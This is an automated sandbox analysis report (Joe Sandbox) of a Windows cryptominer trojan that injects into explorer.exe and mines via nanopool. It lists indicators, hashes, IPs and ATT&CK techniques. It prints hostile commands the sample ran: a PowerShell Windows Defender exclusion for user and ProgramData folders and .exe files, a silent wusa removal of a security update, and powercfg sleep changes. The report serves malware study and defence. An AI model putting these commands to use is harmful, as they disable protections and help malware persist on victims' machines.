            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeMemory written: PID: 3444 base: 140000000 value: 4DJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeMemory written: PID: 3444 base: 140001000 value: NUJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeMemory written: PID: 3444 base: 140665000 value: DFJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeMemory written: PID: 3444 base: 140834000 value: 00Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeMemory written: PID: 3444 base: D1D010 value: 00Jump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeThread register set: target process: 1696Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeThread register set: target process: 3444Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies power options to not sleep / hibernate
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		11
            Windows Service            		11
            Windows Service            		1
            Masquerading            		OS Credential Dumping321
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Service Execution            		1
            DLL Side-Loading            		311
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture1
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            File Deletion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527537 Sample: aA45th2ixY.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 54 xmr-eu1.nanopool.org 2->54 58 Multi AV Scanner detection for submitted file 2->58 60 Yara detected Xmrig cryptocurrency miner 2->60 62 Sigma detected: Stop EventLog 2->62 66 3 other signatures 2->66 8 kgpcbqezuufy.exe 1 2->8         started        12 aA45th2ixY.exe 1 2 2->12         started        signatures3 64 DNS related to crypt mining pools 54->64 process4 file5 50 C:\Windows\Temp\hnkcgwelkfzn.sys, PE32+ 8->50 dropped 68 Multi AV Scanner detection for dropped file 8->68 70 Injects code into the Windows Explorer (explorer.exe) 8->70 72 Modifies the context of a thread in another process (thread injection) 8->72 74 Sample is not signed and drops a device driver 8->74 14 explorer.exe 8->14         started        18 powershell.exe 8->18         started        20 cmd.exe 8->20         started        28 5 other processes 8->28 52 C:\ProgramData\...\kgpcbqezuufy.exe, PE32+ 12->52 dropped 76 Uses powercfg.exe to modify the power settings 12->76 78 Adds a directory exclusion to Windows Defender 12->78 80 Modifies power options to not sleep / hibernate 12->80 22 powershell.exe 23 12->22         started        24 cmd.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 7 other processes 12->30 signatures6 process7 dnsIp8 56 51.15.58.224, 10343, 49731 OnlineSASFR France 14->56 82 System process connects to network (likely due to code injection or exploit) 14->82 84 Query firmware table information (likely to detect VMs) 14->84 86 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->86 32 conhost.exe 18->32         started        44 2 other processes 20->44 88 Loading BitLocker PowerShell Module 22->88 34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        38 wusa.exe 24->38         started        40 conhost.exe 26->40         started        46 4 other processes 28->46 42 conhost.exe 30->42         started        48 6 other processes 30->48 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            aA45th2ixY.exe58%ReversingLabsWin64.Trojan.MintZard

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe58%ReversingLabsWin64.Trojan.MintZard
            C:\Windows\Temp\hnkcgwelkfzn.sys5%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            xmr-eu1.nanopool.org
            		162.19.224.121
            		truetrue
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://crl.cloudflare.com/origin_ca.crle.s6$explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://ocsp.cloudflare.com/origin_caexplorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://ocsp.cloudflare.com/origin_ca0explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        51.15.58.224
                        		unknownFrance
                        		12876OnlineSASFRtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1527537
                        Start date and time:2024-10-07 01:37:07 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 18s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:43
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:aA45th2ixY.exe
                        renamed because original name is a hash value
                        Original Sample Name:40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e.exe
                        Detection:MAL
                        Classification:mal100.spyw.evad.mine.winEXE@58/12@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 27
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: aA45th2ixY.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        19:38:09API Interceptor29x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        51.15.58.22425C1.exeGet hashmaliciousGlupteba, XmrigBrowse
                          8EbwkHzF0i.exeGet hashmaliciousXmrig, zgRATBrowse
                            file.exeGet hashmaliciousGlupteba, SmokeLoader, XmrigBrowse
                              file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                file.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                                  file.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                                    file.exeGet hashmaliciousXmrigBrowse
                                      file.exeGet hashmaliciousXmrigBrowse
                                        file.exeGet hashmaliciousXmrigBrowse
                                          file.exeGet hashmaliciousPhonk Miner, XmrigBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            xmr-eu1.nanopool.orgS0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                            • 162.19.224.121
                                            Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 163.172.154.142
                                            BWP2uPDDxw.exeGet hashmaliciousXmrigBrowse
                                            • 163.172.154.142
                                            BkkZPdT1uc.exeGet hashmaliciousXmrigBrowse
                                            • 54.37.232.103
                                            Chrome.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            SetLoader.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            ekBTbONX85.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.58.224
                                            yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                            • 212.47.253.124
                                            SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                                            • 51.15.65.182

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            OnlineSASFRhttp://ak437453-76542337354.com/Get hashmaliciousUnknownBrowse
                                            • 51.158.227.247
                                            https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptNGet hashmaliciousUnknownBrowse
                                            • 212.129.3.112
                                            81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                            • 163.172.136.118
                                            WannaCry.bin.zipGet hashmaliciousConti, WannacryBrowse
                                            • 163.172.131.88
                                            http://d-mj-hood-83.limesurvey.net/182116/Get hashmaliciousUnknownBrowse
                                            • 51.158.227.154
                                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                            • 195.154.173.35
                                            SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 195.154.173.35
                                            SecuriteInfo.com.Gen.Heur.Munp.1.11072.7602.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 195.154.173.35
                                            report_209.pdfGet hashmaliciousUnknownBrowse
                                            • 62.210.196.157
                                            g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                            • 212.129.25.206

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Windows\Temp\hnkcgwelkfzn.sys1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                                              updater.exeGet hashmaliciousXmrigBrowse
                                                7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                                  LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                                                    file.exeGet hashmaliciousXmrigBrowse
                                                      SecuriteInfo.com.Win64.Evo-gen.13032.15171.exeGet hashmaliciousXmrigBrowse
                                                        file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                          S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                            Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                                                              file.exeGet hashmaliciousXmrigBrowse

                                                                Created / dropped Files

                                                                C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\aA45th2ixY.exe
                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2684712
                                                                Entropy (8bit):6.559876563234829
                                                                Encrypted:false
                                                                SSDEEP:49152:3GP12M443HsaixDif+GwpQ0WoIujEmXZpD3F93lRg7OE+Goqe1HFl:2m6HsaCDifuZW1cEIpZ93l3EylPl
                                                                MD5:6694E88CD0B76E774385E450B3027F35
                                                                SHA1:5049C878BBBBFBEEE9A38489086CB77A94C8F663
                                                                SHA-256:40C59F3C50480CD8732770EF31A0116865F62C75501DC1AFE3A3A9FF89F39D8E
                                                                SHA-512:B404E98F602FA09D22B08065AF32FEACBE8C96C9DBF677E50BB420CD80CB217864A1564F7A931FC747E78AEFF3691EA1E6D3A58ACFDDDFAA234E21D5B43C14FD
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......z....(.....@..........@..............................)...........`.................................................`...<.....(. )....(.......(.(K....).x...............................(.......8...............X............................text...6y.......z.................. ..`.rdata...............~..............@..@.data.....'.......'.................@....pdata........(......z(.............@..@.00cfg........(......|(.............@..@.tls..........(......~(.............@....rsrc... )....(..*....(.............@..@.reloc..x.....).......(.............@..B........................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
